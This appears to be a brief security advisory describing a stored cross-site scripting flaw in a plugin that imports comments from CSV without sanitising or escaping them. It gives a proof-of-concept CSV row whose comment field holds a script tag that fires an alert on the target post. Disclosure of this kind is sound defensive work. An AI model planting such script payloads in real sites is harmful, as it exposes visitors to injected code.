The plugin does not sanitise and escaped imported comments, which could allow high privilege users to import malicious ones (either intentionnaly or not) and lead to Stored Cross-Site Scripting issues
Import the following CSV (as comment):
comment_post_ID,comment_author,comment_content,comment_rating,comment_approved,user_id
1,admin,malicious<script>alert(/XSS/)</script>,5,1,admin
Then the XSS will be triggered in the post the comment has been imported (comment_post_ID)